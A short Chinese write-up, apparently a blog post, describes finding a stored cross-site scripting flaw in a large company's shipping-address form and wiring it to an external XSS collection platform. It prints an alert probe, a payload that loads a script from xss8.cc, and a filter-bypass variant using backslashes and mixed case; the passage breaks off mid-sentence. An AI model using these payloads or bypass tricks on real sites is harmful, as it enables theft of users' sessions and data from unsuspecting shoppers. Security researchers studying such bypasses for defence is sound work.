0x01 找到存在XSS的位置
没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。
使用的XSS代码:<img src=1 onerror=alert(1)
#因为CSDN编辑器的原因,这里括号不能补全,使用该XSS的时候alert(1)后要加上右括号以补全前面的左括号。
0x02 构造XSS代码连接到XSS平台
XSS平台给我们的XSS代码是这样的:
</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>
直接插入的话会提示参数非法,经过多次尝试,最后发现该平台会对双引号、script字符进行识别过滤,大小写会被过滤,于是尝试插入下面的语句:
</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>
这条代码比上面平台给的XSS代码的多了几个 “\”,也就是转义字